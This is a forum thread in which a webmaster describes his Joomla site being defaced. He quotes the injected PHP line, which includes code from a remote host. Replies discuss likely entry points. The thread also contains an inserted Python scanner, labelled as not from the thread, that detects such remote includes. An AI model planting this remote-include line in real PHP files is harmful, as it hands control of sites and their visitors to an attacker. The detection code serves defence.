My Website Has Been Hacked! - Webmasters - Nairaland

My Website Has Been Hacked! by lojik(m): 1:41am On Jul 17, 2009
It looked like a movie to me.
10pm and I just wanted to check my site stats before going to bed.
Pages on my site all displayed blank, like an empty index.html file.
I quickly tried other browsers in case Chrome had started messing up; the other four browsers displayed the same! I thought it was my host, so I typed in the URLs of some of my clients that I hosted on the same server; they are all displaying fine.

I don die today! Kia, I launch FTP client and begin view my source code. This is what I saw:
The code below was appended to the end of every PHP file on my site:

<?php echo '<?php include 'http://the-first-five-pages.com/code.html'; ?>'; ?>

I immediately checked my remote backup location for my database backups. The last one was just 5 hours ago. I checked my site logs and my filesystem remote backup location and they were all updated today. Thank God! I won't lose much. I immediately restored the filesystem from the file backups, dropped the databases and recreated them from the SQL backups. My site was up again by 1:27am www.afrisoft.org . Thanks to auto-backup scripts, I would have been sent back in time.

To prevent future occurrences like this, can anyone in here tell me how an outsider got to modify my PHP files? Please, how can I guard against such in the future? Is there something I enabled?
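One way to check a downloaded copy of the site, or a backup before restoring it, for the change described in the post above: PHP files that include a remote URL, especially in their last few hundred characters. This is an added example, not code from the thread; the function names and the 512-character tail window are assumptions, and the sample files are constructed around the line quoted in the post.

```python
import re
import tempfile
from pathlib import Path

# include/require (optionally _once) whose argument is a quoted remote URL.
REMOTE_INCLUDE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]((?:https?|ftp)://[^'"\s]+)['"]""",
    re.IGNORECASE,
)
TAIL_CHARS = 512  # assumption: "appended to the end" = within the last 512 characters

# The appended line as quoted in the post above.
APPENDED = "<?php echo '<?php include 'http://the-first-five-pages.com/code.html'; ?>'; ?>"


def find_remote_includes(source):
    """Return (offset, url, in_tail) for every remote include in PHP source text."""
    tail_start = max(0, len(source) - TAIL_CHARS)
    return [(m.start(), m.group(1), m.start() >= tail_start)
            for m in REMOTE_INCLUDE.finditer(source)]


def scan_tree(root):
    """Map each .php file under root (relative path) to its remote-include hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        # errors="replace" keeps the scan going on files with odd encodings.
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = find_remote_includes(text)
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def demo():
    """Scan a constructed two-file site: one clean file, one with the appended line."""
    clean = "<?php\nrequire_once 'lib/db.php';\necho 'ok';\n?>\n"
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(clean + APPENDED + "\n")
        Path(root, "about.php").write_text(clean)
        return scan_tree(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        for offset, url, in_tail in hits:
            where = "tail" if in_tail else "body"
            print(f"{name}: remote include of {url} at offset {offset} ({where})")
```

Running the same scan over each backup set shows which backups predate the modification, so a restore does not bring the appended line back.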
Re: My Website Has Been Hacked! by Nobody: 6:38am On Jul 17, 2009
This one na serious matterz o!
Re: My Website Has Been Hacked! by yawatide(f): 3:01pm On Jul 17, 2009
They got in through a backdoor you created, obviously. For example, how are you guarding against SQL injections? How do you capture your form fields? Good thing is, you have backups.

Nitation, a fellow forumite is pretty good at this stuff and I am sure wouldn't mind sharing with us all strategies to prevent such hacking.
Re: My Website Has Been Hacked! by nitation(m): 3:51pm On Jul 17, 2009
@ Poster,

It will be very difficult for anyone to say exactly how or why your system (website) was compromised. In this situation, there are numerous reasons attached to it:

a) You might have chosen a simple or dictionary password for your ftp credentials. An attacker could use different brute force programs to guess what your ftp password is, since the username is very easy to discover. Or you have your password saved in an environment where anyone can make use of it.

b) You have developed an application that relies on register_globals to be ON

c) Your hosting company's account was compromised and you were affected.

d) Since you're on a shared hosting, you will observe that you're not the only one on the server. If domain X is vulnerable, an intelligent attacker could pose threat to you on domain Y.

e) You have a page/file(s) that allows remote files to be included without proper check. eg-> shell access

and so forth. You should contact a professional to scan, test and secure your application from further threat.

NB: You may also post your log file, let us examine it.

@ Yawatide: Thank you for the recommendation, it's highly appreciated!

Regards

- nitation
Re: My Website Has Been Hacked! by lojik(m): 6:43pm On Jul 17, 2009
Thanks nitation. My site was hosted on joomla 1.5.

a. My password has no English meaning and contains numbers. This is because I'm well aware of brute forcing.
b. I do not have access to php.ini, so I had used .htaccess to set register_globals to off.
c. This is very likely.
d. This is also very likely.
e. No, I don't.

@ yawatide
Though I disabled user registration on my site, after reading your post, I realise I left some forms I manually coded into Joomla vulnerable to code injection (How careless?). I've tidied that up now and I'll cross-check all nitation's points again.

I tried to Google the appended code but found nothing on it.
Thanks guys. If there's more I should know, please, it's welcome.
Re: My Website Has Been Hacked! by yawatide(f): 6:58pm On Jul 17, 2009
Hmm, not that I trust joomla and/or its installable components 100% but I would imagine that if they went through the trouble to code a registration form, then they made sure, for legal reasons, that it is as secure as possible. What did you need done that required a custom registration form?

Depending on what you need done with your form, maybe you should try, if not already, the free component, Community Builder. I recently used it on a project and it is powerful from what I can tell. For one, it allowed me to define my own registration questions (like date of birth, year of graduation, etc) which is better than the (boring) registration form that comes standard with joomla.

I hope this helps.
Re: My Website Has Been Hacked! by sley4life(m): 11:54am On Jul 18, 2009
Please, how can I open two different Yahoo IDs on Explorer 8 at the same time? I can do that on 7, but Explorer 8 seems difficult as it keeps opening the same ID, leaving me to sign out before opening another ID.
Re: My Website Has Been Hacked! by lojik(m): 12:25pm On Jul 18, 2009
I used the forms (2 to be specific) for online activation of my commercial software.

The form validates your product/registration key from my DB (not the Joomla DB) and then gives you an activation code to unlock the shareware. It also integrates with 2 SMS APIs to send an SMS containing your activation code to your phone.

It checks the return value upon sending through the first API. If sending fails, it uses the second to send the SMS.

I'm not sure I can achieve this with Joomla components or modules, so I just coded them myself.

I'll try out Community Builder for some other forms I wanna create.
Re: My Website Has Been Hacked! by yawatide(f): 12:27pm On Jul 18, 2009
"The form validates your product/registration key from my db (not joomla db) and then gives you an activation code to unlock the shareware. It also integrates with 2 sms APIs to send an sms containing your activation code to your phone."

This is probably the problem. There might be tutorials online featuring how to keep non-joomla DBs secure on joomla sites or maybe even components/modules to that effect. You probably already know this but just in case, visit extensions.joomla.org

Good luck!
